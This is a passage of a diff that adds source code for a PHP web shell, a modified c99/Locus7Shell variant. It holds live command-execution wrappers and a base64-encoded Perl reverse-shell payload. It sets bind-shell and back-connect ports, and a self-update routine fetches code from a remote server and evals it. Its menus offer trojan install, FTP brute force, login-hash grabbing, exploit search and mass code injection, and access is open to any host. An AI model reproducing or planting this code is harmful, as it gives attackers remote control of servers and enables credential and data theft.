+$_POST['backcconnmsge']="

Error: Can't connect!"; +} + +function bberr() +{ +$_POST['backcconnmsge']="

Error: Can't backdoor host!"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +//EoW + + + + + + + + + + + + + + + + +//Start Enumerate function +//function ENUMERATE() + +// $hostname_x=php_uname(n); +// $itshome = getcwd(); +// $itshome = str_replace("/home/","~",$itshome); +// $itshome = str_replace("/public_html","/x2300.php",$itshome); +// $enumerate = "http://".$hostname_x."/".$itshome.""; + +//End Enumerate function + +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.3.37"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "ange78Shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server +$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
Locus7Shell modded by ange78
"; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + 'html'=>array('html','htm','shtml'), + 'txt'=>array('txt','conf','bat','sh','js','bak','doc','log','sfc','cfg','htaccess','passwd','shadow'), + 'exe'=>array('sh','install','bat','cmd'), + 'ini'=>array('ini','inf'), + 'code'=>array('php','phtml','php3','php4','inc','tcl','h','c','cpp','py','cgi','pl'), + 'img'=>array('gif','png','jpeg','jfif','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg'), + 'sdb'=>array('sdb'), + 'phpsess'=>array('sess'), + 'download'=>array('exe','com','pif','src','lnk','zip','rar','gz','tar') +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,'r'); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,'',''), // example + array("config.php",1), // example + array("settings.php",1), + array("connect.php",1) +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range('a','z'); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = 'c99'; // default password for binding +$bindport_port = '31373'; // default port for binding +$bc_port = '5992'; // default port for back-connect +$datapipe_localport = '8081'; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("

[String/Hash Tools]",$surl."act=encoder&d=%d"), + array("[Tools]",$surl."act=tools&d=%d"), + array("[Processes]",$surl."act=processes&d=%d"), + array("[FTP Brute Force]",$surl."act=ftpquickbrute&d=%d"), + array("[System Information]",$surl."act=security&d=%d"), + array("[SQL Shell]",$surl."act=sql&d=%d"), + array("[Kernel Exploit Search]",$millink), + array("[Execute PHP Code]",$surl."act=eval&d=%d"), + array("[PHP Info]
",$surl."act=phpinfo&d=%d") +); +$quicklaunch2 = array( + array("
[Install Trojan/Backdoor]",$surl.'act=trojan'), + array("[Bind Shell Backdoor]",$surl.'act=shbd'), + array("[Back-Connection]",$surl.'act=backc'), + array("[Mass Code Injection]",$surl.'act=massbrowsersploit'), + array("[Exploits]",$surl.'act=exploits'), + array("[Grab Login Hashes]",$surl.'act=grablogins'), + array("[Suicide Script]
",$surl.'act=selfremove') +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +/*function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +}*/ +/*function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +}*/ +/*function err($n,$txt='') +{ +echo '
'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
'; +return null; +}*/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("x2300 Shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink(html_entity_decode($o));} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists('tabsort')) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists('view_perms')) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by Locous7Shell.SQL v. ".$shver." +# Home page: http://www.Locus7s.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



 
Fields:
"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
";} + echo "
"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + 